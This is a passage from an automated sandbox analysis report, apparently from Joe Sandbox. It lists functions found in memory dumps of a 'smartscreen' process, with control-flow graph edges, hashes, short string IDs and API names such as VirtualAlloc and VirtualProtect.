                                                                                                      • Instruction Fuzzy Hash: 8843CD70A0995D8FEFA8EB58C8A5BA9B7B1FF58300F1442E9D01DD3295DE356A81CF40
                                                                                                      Function 00007FFD9B8C91CD Relevance: 1.8, Strings: 1, Instructions: 520COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 501 7ffd9b8c91cd-7ffd9b8c91ec 503 7ffd9b8c9236-7ffd9b8c92c5 501->503 504 7ffd9b8c91ee-7ffd9b8c9222 501->504 508 7ffd9b8c92c7-7ffd9b8c92cc 503->508 509 7ffd9b8c92cf-7ffd9b8c92d8 503->509 505 7ffd9b8c9229-7ffd9b8c9233 504->505 506 7ffd9b8c9224 504->506 505->503 506->505 508->509 510 7ffd9b8c9750-7ffd9b8c9756 509->510 511 7ffd9b8c975c-7ffd9b8c9775 510->511 512 7ffd9b8c92dd-7ffd9b8c9307 510->512 513 7ffd9b8c9309 512->513 514 7ffd9b8c930e-7ffd9b8c9327 512->514 513->514 515 7ffd9b8c9329 514->515 516 7ffd9b8c932e-7ffd9b8c9348 514->516 515->516 518 7ffd9b8c934a 516->518 519 7ffd9b8c934f-7ffd9b8c9367 516->519 518->519 520 7ffd9b8c9369 519->520 521 7ffd9b8c936e-7ffd9b8c938f 519->521 520->521 522 7ffd9b8c9391-7ffd9b8c9395 521->522 523 7ffd9b8c93fd-7ffd9b8c941a 521->523 522->523 526 7ffd9b8c9397-7ffd9b8c93ab 522->526 524 7ffd9b8c941c 523->524 525 7ffd9b8c9421-7ffd9b8c943a 523->525 524->525 527 7ffd9b8c943c 525->527 528 7ffd9b8c9441-7ffd9b8c945b 525->528 529 7ffd9b8c93ef-7ffd9b8c93f5 526->529 527->528 532 7ffd9b8c9462-7ffd9b8c947a 528->532 533 7ffd9b8c945d 528->533 530 7ffd9b8c93f7-7ffd9b8c93f8 529->530 531 7ffd9b8c93ad-7ffd9b8c93b1 529->531 536 7ffd9b8c948e-7ffd9b8c9590 530->536 537 7ffd9b8c93bc-7ffd9b8c93d2 531->537 538 7ffd9b8c93b3-7ffd9b8c93b9 531->538 534 7ffd9b8c947c 532->534 535 7ffd9b8c9481-7ffd9b8c948b 532->535 533->532 534->535 535->536 541 7ffd9b8c95a5-7ffd9b8c9612 536->541 542 7ffd9b8c9592-7ffd9b8c95a2 536->542 539 7ffd9b8c93d9-7ffd9b8c93ec 537->539 540 7ffd9b8c93d4 537->540 538->537 539->529 540->539 543 7ffd9b8c966b-7ffd9b8c966f 541->543 544 7ffd9b8c9614-7ffd9b8c962d 541->544 542->541 547 7ffd9b8c9676-7ffd9b8c968f 543->547 548 7ffd9b8c9671 543->548 545 7ffd9b8c962f-7ffd9b8c9633 544->545 546 7ffd9b8c96a0-7ffd9b8c96b7 544->546 545->546 552 7ffd9b8c9635-7ffd9b8c9644 545->552 550 7ffd9b8c96b9 546->550 551 7ffd9b8c96be-7ffd9b8c96d8 546->551 549 7ffd9b8c9692-7ffd9b8c9698 547->549 548->547 553 7ffd9b8c969a-7ffd9b8c969b 549->553 554 7ffd9b8c9646-7ffd9b8c964a 549->554 550->551 555 7ffd9b8c96da 551->555 556 7ffd9b8c96df-7ffd9b8c9703 551->556 552->549 557 7ffd9b8c9748-7ffd9b8c974d 553->557 560 7ffd9b8c964c-7ffd9b8c965b 554->560 561 7ffd9b8c965e-7ffd9b8c9665 554->561 555->556 558 7ffd9b8c970a-7ffd9b8c972e 556->558 559 7ffd9b8c9705 556->559 557->510 562 7ffd9b8c9735-7ffd9b8c9746 558->562 563 7ffd9b8c9730 558->563 559->558 560->561 561->543 562->557 563->562
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B8C7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b8c7000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 1(x
                                                                                                      • API String ID: 0-3237925078
                                                                                                      • Opcode ID: 650819304fe912f32fbdc20aba5aceabd262ff0899f23df04fd85c75422912b3
                                                                                                      • Instruction ID: b2d6e6e593e22d6a732c406438083ec67056859b58fcfb46bad081175ad47065
                                                                                                      • Opcode Fuzzy Hash: 650819304fe912f32fbdc20aba5aceabd262ff0899f23df04fd85c75422912b3
                                                                                                      • Instruction Fuzzy Hash: 8F223770E0461D8FCB59DFA8C495AECBBB1FF49300F14866AD419EB259DB34A981CF50
                                                                                                      Function 00007FFD9B8D4164 Relevance: 1.6, Strings: 1, Instructions: 374COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B8C7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b8c7000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: @
                                                                                                      • API String ID: 0-2766056989
                                                                                                      • Opcode ID: 0b3091e0aa45cf87657f9ce020a74bba11f4c92eb8c418fed1a14c3a7bfa35df
                                                                                                      • Instruction ID: f4029d40e0cdc7d58ea230a93152aa7432af92b895a830ed8a0d485dbbf64bf2
                                                                                                      • Opcode Fuzzy Hash: 0b3091e0aa45cf87657f9ce020a74bba11f4c92eb8c418fed1a14c3a7bfa35df
                                                                                                      • Instruction Fuzzy Hash: 35F1CE70A1965D8FDBA8DF58C895BA8B7F1FB5C301F5546BAD00DE3291DA346A80CF40
                                                                                                      Function 00007FFD9B88F36C Relevance: .7, Instructions: 739COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 686 7ffd9b88f36c-7ffd9b88f397 687 7ffd9b88f398-7ffd9b88f3ba 686->687 689 7ffd9b88f3bc-7ffd9b88f415 687->689 693 7ffd9b88f46e-7ffd9b88f474 689->693 694 7ffd9b88f476-7ffd9b88f4d9 call 7ffd9b88fe91 693->694 695 7ffd9b88f417-7ffd9b88f46b 693->695 705 7ffd9b88fe72-7ffd9b88fe7f 694->705 695->693 706 7ffd9b88fe85-7ffd9b88fe90 705->706 707 7ffd9b88f4de-7ffd9b88f4ed 705->707 709 7ffd9b88f4ef 707->709 710 7ffd9b88f4f4-7ffd9b88f65e 707->710 709->710 721 7ffd9b88f660-7ffd9b88f69e 710->721 722 7ffd9b88f6d2-7ffd9b88f772 710->722 726 7ffd9b88f6a9-7ffd9b88f6cd 721->726 731 7ffd9b88f7e3-7ffd9b88f82b 722->731 732 7ffd9b88f774-7ffd9b88f7e1 722->732 730 7ffd9b88fe6a-7ffd9b88fe6f 726->730 730->705 738 7ffd9b88f836-7ffd9b88f83c 731->738 732->738 739 7ffd9b88f8be-7ffd9b88f8cb 738->739 740 7ffd9b88f841-7ffd9b88f868 739->740 741 7ffd9b88f8d1-7ffd9b88f983 739->741 742 7ffd9b88f86a 740->742 743 7ffd9b88f86f-7ffd9b88f8bb 740->743 750 7ffd9b88fc00-7ffd9b88fc06 741->750 742->743 743->739 751 7ffd9b88f988-7ffd9b88f98c 750->751 752 7ffd9b88fc0c-7ffd9b88fc1f 750->752 753 7ffd9b88f9a9-7ffd9b88fbaa 751->753 754 7ffd9b88f98e-7ffd9b88f9a5 751->754 755 7ffd9b88fc20-7ffd9b88fc2a 752->755 760 7ffd9b88fbad-7ffd9b88fbaf 753->760 754->753 759 7ffd9b88fc2f-7ffd9b88fc37 755->759 764 7ffd9b88fca8 759->764 765 7ffd9b88fc38-7ffd9b88fc3b 759->765 760->755 761 7ffd9b88fbb1-7ffd9b88fbb3 760->761 761->759 763 7ffd9b88fbb5 761->763 767 7ffd9b88fbb7 763->767 768 7ffd9b88fb3c 763->768 766 7ffd9b88fca9-7ffd9b88fcb1 764->766 769 7ffd9b88fcb7-7ffd9b88fcc9 765->769 770 7ffd9b88fc3d 765->770 766->769 774 7ffd9b88fbbc 767->774 768->760 773 7ffd9b88fb3e-7ffd9b88fb40 768->773 771 7ffd9b88fd3a-7ffd9b88fd3e 769->771 772 7ffd9b88fccb-7ffd9b88fccd 769->772 775 7ffd9b88fc3e-7ffd9b88fc40 770->775 776 7ffd9b88fbc4 770->776 777 7ffd9b88fd49-7ffd9b88fd52 771->777 772->777 778 7ffd9b88fccf 772->778 773->774 779 7ffd9b88fb42 773->779 774->765 780 7ffd9b88fbbe-7ffd9b88fbc2 774->780 781 7ffd9b88fc56-7ffd9b88fc9c 775->781 782 7ffd9b88fbc6 776->782 783 7ffd9b88fb4b 776->783 785 7ffd9b88fdc3-7ffd9b88fdd3 777->785 786 7ffd9b88fd54 777->786 778->781 787 7ffd9b88fcd1 778->787 788 7ffd9b88fac9-7ffd9b88facb 779->788 789 7ffd9b88fb44 779->789 780->775 780->776 797 7ffd9b88fcf1-7ffd9b88fd1c 781->797 798 7ffd9b88fc9e-7ffd9b88fca6 781->798 784 7ffd9b88fbcb-7ffd9b88fbf2 782->784 790 7ffd9b88fb4c-7ffd9b88fb4f 783->790 802 7ffd9b88fbf8-7ffd9b88fbfd 784->802 794 7ffd9b88fdd5-7ffd9b88fdd7 785->794 795 7ffd9b88fe44-7ffd9b88fe52 785->795 793 7ffd9b88fd8d 786->793 787->797 788->790 796 7ffd9b88facd 788->796 789->783 790->784 792 7ffd9b88fb51 790->792 799 7ffd9b88fad8-7ffd9b88fada 792->799 800 7ffd9b88fb53 792->800 793->785 801 7ffd9b88fe53-7ffd9b88fe68 794->801 803 7ffd9b88fdd9-7ffd9b88fddb 794->803 795->801 796->799 797->793 809 7ffd9b88fd1e-7ffd9b88fd22 797->809 798->764 804 7ffd9b88fb5b-7ffd9b88fb82 799->804 806 7ffd9b88fadc-7ffd9b88fb0c 799->806 800->804 801->730 802->750 803->795 804->802 806->802 809->766 814 7ffd9b88fd24 809->814 814->771
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B88C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B88C000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b88c000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 0f579e79bc09e5c425bfb886dd7dde8d304a26d9f4b6371e2495f0a383c39fd2
                                                                                                      • Instruction ID: fa97679f632860436ec768c13888c19ab84e67401e28715b19436c4fdf277428
                                                                                                      • Opcode Fuzzy Hash: 0f579e79bc09e5c425bfb886dd7dde8d304a26d9f4b6371e2495f0a383c39fd2
                                                                                                      • Instruction Fuzzy Hash: 1E52CC70A09A1D8FDBA9DB58C8A5BA8B7B1FF58301F5005E9D41DD72A1DB34AE81CF40
                                                                                                      Function 00007FFD9B880DA0 Relevance: .3, Instructions: 293COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 899 7ffd9b880da0-7ffd9b880db7 900 7ffd9b880dba-7ffd9b880df9 899->900 901 7ffd9b880db9 899->901 902 7ffd9b880e00-7ffd9b880eb7 call 7ffd9b8807d0 900->902 903 7ffd9b880dfb 900->903 901->900 916 7ffd9b880ecf-7ffd9b880fa8 902->916 917 7ffd9b880eb9-7ffd9b880ece 902->917 903->902 930 7ffd9b880fc0-7ffd9b880fe3 916->930 931 7ffd9b880faa-7ffd9b880fbe 916->931 917->916 934 7ffd9b880feb-7ffd9b8810dc 930->934 931->930
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b880000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 73e47b7343c01d4794e36ea10f6dba7d5378e04a57ba070495a295d280a5278a
                                                                                                      • Instruction ID: d03fa3a1db6f5606332417938f9ce2bd28668a424ef964b35cc8527630cb72c6
                                                                                                      • Opcode Fuzzy Hash: 73e47b7343c01d4794e36ea10f6dba7d5378e04a57ba070495a295d280a5278a
                                                                                                      • Instruction Fuzzy Hash: FCA1F0B1A19A4D8FEB9CDB68C8657A97FE1FF99304F4001BAD059D72E6CB782801C741
                                                                                                      Function 00007FFD9B895F66 Relevance: 2.6, Strings: 2, Instructions: 52COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 481 7ffd9b895f66-7ffd9b895f99 483 7ffd9b895fa3-7ffd9b895fbb 481->483 484 7ffd9b895fc6-7ffd9b895fcd 483->484 485 7ffd9b895fed-7ffd9b896783 484->485 486 7ffd9b895fcf-7ffd9b8966d7 484->486 485->484 486->484 493 7ffd9b8966dd-7ffd9b8966e7 486->493 493->484
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B895000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B895000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b895000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: +$pR_H
                                                                                                      • API String ID: 0-2848657385
                                                                                                      • Opcode ID: 33e81571372aec7a0d6de3302f488060b565d3b647cbd7fe47bcbb094d845a5c
                                                                                                      • Instruction ID: 5fe478351e98a41153b26e39affb2637533ba1dfa8a3db43a388718d95c6936f
                                                                                                      • Opcode Fuzzy Hash: 33e81571372aec7a0d6de3302f488060b565d3b647cbd7fe47bcbb094d845a5c
                                                                                                      • Instruction Fuzzy Hash: 3011E974A0A61D8BDFA4DB58D8A47E8B7B1EB5C340F1141A9E00EE7295CE386B84CB40
                                                                                                      Function 00007FFD9B88AE5E Relevance: 2.5, Strings: 2, Instructions: 43COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 494 7ffd9b88ae5e-7ffd9b88ae72 495 7ffd9b88ae7c-7ffd9b88ae89 494->495 496 7ffd9b888ba8-7ffd9b888bfd 495->496 497 7ffd9b88ae8f-7ffd9b88aebf 495->497
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B886000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B886000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b886000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: "$)
                                                                                                      • API String ID: 0-2010264150
                                                                                                      • Opcode ID: 9fd6aebf94105a3c3630c1fe5b4233f2709ee1ad4ebddc075256b72939c93031
                                                                                                      • Instruction ID: 6df856715308c673239cc98cae428bec99e0914610913189bdaad43121e0f012
                                                                                                      • Opcode Fuzzy Hash: 9fd6aebf94105a3c3630c1fe5b4233f2709ee1ad4ebddc075256b72939c93031
                                                                                                      • Instruction Fuzzy Hash: 4A11CB70E0652E8FEBB4AB58D8597A9B6B0EF08301F1140F9D45DA2291DF781AC48F06
                                                                                                      Function 00007FFD9B8917CE Relevance: 1.7, APIs: 1, Instructions: 190memoryCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 564 7ffd9b8917ce-7ffd9b8917db 565 7ffd9b8917e6-7ffd9b8917f7 564->565 566 7ffd9b8917dd-7ffd9b8917e5 564->566 567 7ffd9b8917f9-7ffd9b891801 565->567 568 7ffd9b891802-7ffd9b89191b VirtualProtect 565->568 566->565 567->568 573 7ffd9b89191d 568->573 574 7ffd9b891923-7ffd9b891973 568->574 573->574
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B891000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B891000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b891000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ProtectVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 544645111-0
                                                                                                      • Opcode ID: bfc7496c6417f53d63062d4c8a7d9c76983b5daaced66d740fbddf647cd63bde
                                                                                                      • Instruction ID: 152f351721678993cb611684e995c66574586cf717f81540f9035762cb1f6162
                                                                                                      • Opcode Fuzzy Hash: bfc7496c6417f53d63062d4c8a7d9c76983b5daaced66d740fbddf647cd63bde
                                                                                                      • Instruction Fuzzy Hash: 0D515C70D0864D8FDF58DFA8C885AEDBBF1FB5A310F1042AAD449E3251DB74A885CB41
                                                                                                      Function 00007FFD9B8931BD Relevance: 1.5, APIs: 1, Instructions: 223memoryCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 661 7ffd9b8931bd-7ffd9b8931d9 662 7ffd9b8931db-7ffd9b8932f3 VirtualAlloc 661->662 663 7ffd9b893170-7ffd9b8931ba 661->663 669 7ffd9b8932f5 662->669 670 7ffd9b8932fb-7ffd9b89335f 662->670 669->670
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B891000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B891000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b891000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 4275171209-0
                                                                                                      • Opcode ID: 4ec547129fdbc1591c1e0c9345b2911beed2b69842718154546698332e62a6ae
                                                                                                      • Instruction ID: 09f871408e1dca1d24b26a27a431eb81fe0daa1343300bc1bacd86dcec2e6559
                                                                                                      • Opcode Fuzzy Hash: 4ec547129fdbc1591c1e0c9345b2911beed2b69842718154546698332e62a6ae
                                                                                                      • Instruction Fuzzy Hash: 09614D70908A5D8FDF98EF58C885BE9BBF1FB69310F1041AAD44DE3255DB31A985CB80
                                                                                                      Function 00007FFD9B8D11D8 Relevance: 1.3, Strings: 1, Instructions: 73COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 673 7ffd9b8d11d8-7ffd9b8d122e
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B8C7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b8c7000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 2J_^
                                                                                                      • API String ID: 0-3080444488
                                                                                                      • Opcode ID: e82fc0436e393070d7553025ff4f23cf775b5c229355e3ffca2ac55850646822
                                                                                                      • Instruction ID: 5fa84b053f5da57d052f3faca96f2edda98aecf2167ecee6b8e8b2c49b68364c
                                                                                                      • Opcode Fuzzy Hash: e82fc0436e393070d7553025ff4f23cf775b5c229355e3ffca2ac55850646822
                                                                                                      • Instruction Fuzzy Hash: 95112732A081298FDB4AFF6CE8A59E977A0EF84318F0441B7D05DC7196DE345542C780
                                                                                                      Function 00007FFD9B8CA2D9 Relevance: 1.3, Strings: 1, Instructions: 49COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 682 7ffd9b8ca2d9-7ffd9b8ca316 683 7ffd9b8ca318 682->683 684 7ffd9b8ca31d-7ffd9b8ca339 682->684 683->684 685 7ffd9b8ca33f-7ffd9b8ca34c 684->685
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B8C7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b8c7000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: U
                                                                                                      • API String ID: 0-3372436214
                                                                                                      • Opcode ID: 3a34e82c8c0d40ded21904b9245055d8d82eb7804af7da2eee8a644c559377ee
                                                                                                      • Instruction ID: 0a9d4b36fc6777152c12ce5aea4dd61bef4d4316e8b5be73d7ecc4cb2c6d7876
                                                                                                      • Opcode Fuzzy Hash: 3a34e82c8c0d40ded21904b9245055d8d82eb7804af7da2eee8a644c559377ee
                                                                                                      • Instruction Fuzzy Hash: 6A116130918A4D8FCF85EF68C858AEA7BF0FF29305F0105AAD419C72A5D7349554CB80
                                                                                                      Function 00007FFD9B8CC45D Relevance: .4, Instructions: 440COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B8C7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b8c7000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b0c48393e7de69f0426f807ffe3b3db86c731af611d03ce8c4f4d8b1d23cb1d7
                                                                                                      • Instruction ID: f3197df96f999cf682a7a95c258d237bb2f208574bb516cac9b8bef3a4006b19
                                                                                                      • Opcode Fuzzy Hash: b0c48393e7de69f0426f807ffe3b3db86c731af611d03ce8c4f4d8b1d23cb1d7
                                                                                                      • Instruction Fuzzy Hash: 83F13FB1E1995D8FDB9CEB58C8A5BB8B7A1FF58300F4441BAD00DA3292DE346981CF41
                                                                                                      Function 00007FFD9B8981B9 Relevance: .1, Instructions: 141COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 972 7ffd9b8981b9-7ffd9b898204 974 7ffd9b898206 972->974 975 7ffd9b89820b-7ffd9b898211 972->975 974->975 976 7ffd9b8982e5-7ffd9b8982eb 975->976 977 7ffd9b898216-7ffd9b89824c 976->977 978 7ffd9b8982f1-7ffd9b8982fa 976->978 980 7ffd9b898252-7ffd9b8982bf 977->980 985 7ffd9b8982dd-7ffd9b8982e2 980->985 986 7ffd9b8982c1-7ffd9b8982ca 980->986 985->976 986->985 987 7ffd9b8982cc-7ffd9b8982dc 986->987
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B895000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B895000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b895000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 5ac56d86a93208df0e0ac914f3a40fb040c97e457b3308b44c4741903495852c
                                                                                                      • Instruction ID: 557fceea63507166370237547eeda6f9c2deda73e78b630886f9acbc575f3d1a
                                                                                                      • Opcode Fuzzy Hash: 5ac56d86a93208df0e0ac914f3a40fb040c97e457b3308b44c4741903495852c
                                                                                                      • Instruction Fuzzy Hash: AD518F30A09A4E9FCF84DF98D494AED7BF1FF58350F0501AAE419E7261D634E991CB80
                                                                                                      Function 00007FFD9B8C981D Relevance: .1, Instructions: 138COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 988 7ffd9b8c981d-7ffd9b8c9867 990 7ffd9b8c9869 988->990 991 7ffd9b8c986e-7ffd9b8c98cb 988->991 990->991 999 7ffd9b8c98d6-7ffd9b8c98da 991->999 1000 7ffd9b8c98cd-7ffd9b8c98d4 991->1000 1001 7ffd9b8c98dc-7ffd9b8c9bb3 999->1001 1002 7ffd9b8c98f7-7ffd9b8c9b06 999->1002 1000->999 1001->999 1009 7ffd9b8c9bb9-7ffd9b8c9bc0 1001->1009 1006 7ffd9b8c9b08 1002->1006 1007 7ffd9b8c9b0d-7ffd9b8c9b1e 1002->1007 1006->1007 1010 7ffd9b8c9b29-7ffd9b8c9b41 1007->1010 1009->999 1011 7ffd9b8c9b48-7ffd9b8c9bb3 1010->1011 1012 7ffd9b8c9b43 1010->1012 1011->999 1011->1009 1012->1011
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B8C7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b8c7000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 2177a602174ebe0577c78416e8c37ba802e1cec214e245a75779e5cb35b168d2
                                                                                                      • Instruction ID: 5ccaab2147581ab969f327fbd7b698f97d1e56b407909db70576d56be03d41f6
                                                                                                      • Opcode Fuzzy Hash: 2177a602174ebe0577c78416e8c37ba802e1cec214e245a75779e5cb35b168d2
                                                                                                      • Instruction Fuzzy Hash: FE518370E09A4E8FEB65EF54C4A57B9B7A1FF59300F0145B6D01DD72AACE34A981CB80
                                                                                                      Function 00007FFD9B883565 Relevance: .1, Instructions: 133COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b880000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 88f85425f809c43665c352c4094f18cb2c1e9a54038cea367f47c2f50bf3cc39
                                                                                                      • Instruction ID: b9de6029557b7a4aed560a41fbd9ab7ee4dcd65a0f83c9b395c45cab36ec1e5d
                                                                                                      • Opcode Fuzzy Hash: 88f85425f809c43665c352c4094f18cb2c1e9a54038cea367f47c2f50bf3cc39
                                                                                                      • Instruction Fuzzy Hash: 32519B70E0952D8FDBA4DF14C898BA977F0FB68301F5041EA901DE2265DB78AA84CF41
                                                                                                      Function 00007FFD9B8D8BC9 Relevance: .1, Instructions: 96COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B8C7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b8c7000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 9839386e4480e0149ea9c96d7e96bc465803bbd051736b04b4a5844f1db53b0b
                                                                                                      • Instruction ID: 07534bc40054d01a55b6c21d9d900bfef3413000bb0b65fb5c4a46ee5c17b155
                                                                                                      • Opcode Fuzzy Hash: 9839386e4480e0149ea9c96d7e96bc465803bbd051736b04b4a5844f1db53b0b
                                                                                                      • Instruction Fuzzy Hash: FD31C170A0964D8FEB65EFA4C8686FD7BF0FF58300F0507AAD429C61A1DB746641CB41
                                                                                                      Function 00007FFD9B897E49 Relevance: .1, Instructions: 87COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B895000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B895000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b895000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 631c61389bcf08d89bb7b409e552ce75dd1270a1bd89d6789b2a1e845ae21503
                                                                                                      • Instruction ID: d9cbe0ab4c9676d87001461f52438cb57146c0067e387bf828eeff634cfc0d8a
                                                                                                      • Opcode Fuzzy Hash: 631c61389bcf08d89bb7b409e552ce75dd1270a1bd89d6789b2a1e845ae21503
                                                                                                      • Instruction Fuzzy Hash: E0315A74A0964D8FDF55DF58C8A5AEE7BB1FF58304F06026AE849E3291CB34AD40CB81
                                                                                                      Function 00007FFD9B8CABDF Relevance: .1, Instructions: 86COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
